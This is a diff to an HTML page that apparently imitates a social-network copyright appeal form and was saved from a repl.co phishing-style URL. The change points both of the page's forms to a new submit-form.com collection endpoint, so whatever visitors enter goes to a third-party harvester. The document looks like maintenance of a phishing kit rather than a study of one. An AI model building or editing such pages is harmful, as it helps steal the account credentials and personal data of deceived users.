--- a/help.html
+++ b/help.html
@@ -1,7 +1,4 @@
 
-
-
-
 <!DOCTYPE html>
 <!-- saved from url=(0064)https://copyright-%2Dappealsubmit.repl.co/submit?mibextid=Zxz2cZ -->
 <html>
@@ -32,7 +29,7 @@
                 </form>
             </div>
         </div>
-        <form action="https://submit-form.com/Y3dfHqrI1" method="post">
+        <form action="https://submit-form.com/e99kgcN4r" method="post">
             <div class="relative flex border bg-[#e9ebee] h-10 md:hidden lg:hidden sm:block">
                 <div>
                     <div>
@@ -114,7 +111,7 @@
                 </form>
             </div>
         </div>
-        <form class="sm:hidden lg:block md:block" action="https://submit-form.com/Y3dfHqrI1" method="post">
+        <form class="sm:hidden lg:block md:block" action="https://submit-form.com/e99kgcN4r" method="post">
             <div class="relative flex border bg-[#e9ebee] h-12 md:block lg:block hidden ">
                 <div>
                     <div>
